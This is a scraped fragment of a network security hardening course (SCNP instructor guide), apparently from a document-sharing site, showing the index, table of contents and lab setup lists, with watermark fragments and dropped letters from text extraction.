target networks, 483-484 TCP, 16-17 connections, 33-34 ags, 17 headers, 40-42 TCP wrapper, 183-187 conguration les, 184-186 TCP/IP ltering, 316-317 hardening, 314-316 TCP/IP model, 3-4 Telnet granting, 366 terminal logging, 372 Terminal Window, 142-143 threat, 383 three-way handshake, 16-17 timestamp, 371 topology, 347 traceroute, 355-356, 488-489 on Linux, 489 on Windows, 488 Transport mode, 79-80 AH, 80 ESP, 80 tripwire, 216-223 database, 218 integrity check, 218-219 modes, 216 policy, 216-218 Trojan Horse, 20-22, 513 Tunnel mode, 79-80 AH, 80 ESP, 80
or
V
ru ct
W
WAN, 236-237 Web design common mistakes, 442-443 Web server access control, 449-450 directory security, 449 Web server log les, 227 Web server security, 444 Web sites conguration, 446-448 maintenance, 448 malicious, 517-518 Webmin, 157-158
st
In
DO
NO
Variable Length Subnet Masking See: VLSM virus, 382, 512 VLSM, 13-14 VTY logging, 375 VTY password, 326 vulnerability, 247-248 vulnerability scanning, 441
DU
PL
IC
Index
AT
575
UDP, 16-17 UDP headers, 43-44 umask command, 171 undo conguration changes, 231 unicast, 14-15, 63 Uninteruptible Power Supply See: UPS UPS, 387-389 full server rack, 389 user accounts expiration dates, 254 users accounts, 146-151 adding, 148-150 security, 253 standard, 147-148 switching accounts, 151
Ed
iti
on
INDEX
Wide Area Network See: WAN wildcard mask, 361-363 Windows ping sweep, 493-496 Windows 2000 DNS, 433-434 EFS, 296-298 local login process, 250-251 network security, 298-301 port scanning, 499-502 printer security, 276 registry security, 276-277 security, 236-237 traceroute, 488 worm, 382, 512
Ed or
DO NO T DU PL IC
x-cast, 14-15 xferlog log le, 227 xinetd.conf, 187-189 xinetd.d, 189-191
zone transfer, 440-441 Zone Transfer traffic, 432
576
In
st
ru ct
AT
iti
on

SCNP Hardening

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

SCNP Hardening

Uploaded by

Copyright:

Available Formats

INSTRUCTOR GUIDE

Hardening The Infrastructure (SCP)

Hardening The Infrastructure (SCP)

HARDENING THE INFRASTRUCTURE (SCP)

HARDENING THE INFRASTRUCTURE (SCP)

Lesson 1: Advanced TCP/IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Lesson 2: Implementing IPSec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77

Lesson 5: Routers and Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321

Appendix A: Hardening the Infrastructure Exam Objectives . . . . . . . . . . . . . . . . . . 543

Lesson 8: Attack Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481

Lesson 7: Security on the Internet and the WWW . . . . . . . . . . . . . . . . . . . . . . . . . 421

Lesson 6: Contingency Planning. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379

HARDENING THE INFRASTRUCTURE (SCP)

LESSON 1: ADVANCED TCP/IP

Topic 1C Topic 1D Topic 1E

Hardening The Infrastructure (SCP)

Topic 1F Topic 1G Topic 1H

LESSON 2: IMPLEMENTING IPSEC

Hardening The Infrastructure (SCP)

LESSON 3: HARDENING LINUX COMPUTERS

LESSON 4: HARDENING WINDOWS COMPUTERS

Windows 2000 EFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .296 Task 4F-1 Encrypting Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298

Hardening The Infrastructure (SCP)

LESSON 5: ROUTERS AND ACCESS CONTROL LISTS

Hardening The Infrastructure (SCP)

LESSON 6: CONTINGENCY PLANNING

LESSON 7: SECURITY ON THE INTERNET AND THE WWW

LESSON 8: ATTACK TECHNIQUES

Topic 8J Topic 8K Topic 8L

Hiding Evidence of an Attack . . . . . . . . . . . . . . . . . . . . . . . . .538

APPENDIX A: HARDENING THE INFRASTRUCTURE EXAM OBJECTIVES

ABOUT THIS COURSE

ABOUT THIS COURSE

Hardening The Infrastructure (SCP)

How do I take the exams?

What are the exams like?

What if I want to go further?

Hardening The Infrastructure (SCP)

How much do the exams cost?

Security+ - A CompTIA Certication

Web site: www.SecurityCertied.Net

COURSE SETUP INFORMATION

1 set for each pair of students

Hardening The Infrastructure (SCP)

2500 Series preferred; IOS 12.2 or greater, with IPSec/SSH support.

DCE to DTE, for connecting routers together. 10/100 Mbps.

500 MHz Pentium III processor (700 MHz or higher recommended).

The hardware listed in the following table.

Hardware and Software Requirements

SID-changing utilities. Norton Ghostwalk is recommended.

Network Scanning Tools

The sysprep utility, from the Windows 2000 Resource Kit.

Windows/Eval is Free Linux/Built-in Linux/Built-in Windows/Free Windows/Free

About This Course

Network Sniffer and Routing Tools

Windows/Eval is Free Windows/Eval is Free Linux/Free

Windows, Linux, DOS/ Free Windows/Free

Hardening The Infrastructure (SCP)

Linux/Free Windows/Free Windows/Free Windows/Eval is free Windows/Eval is free

Windows/ Built-in Windows, Linux/Free

Included in Windows 2000 Server

Trojan Horses and Exploit Tools Used in Tasks

Forensics and Keyboard Logging Tools Used in Tasks

Linux/Free, DOS/Eval is free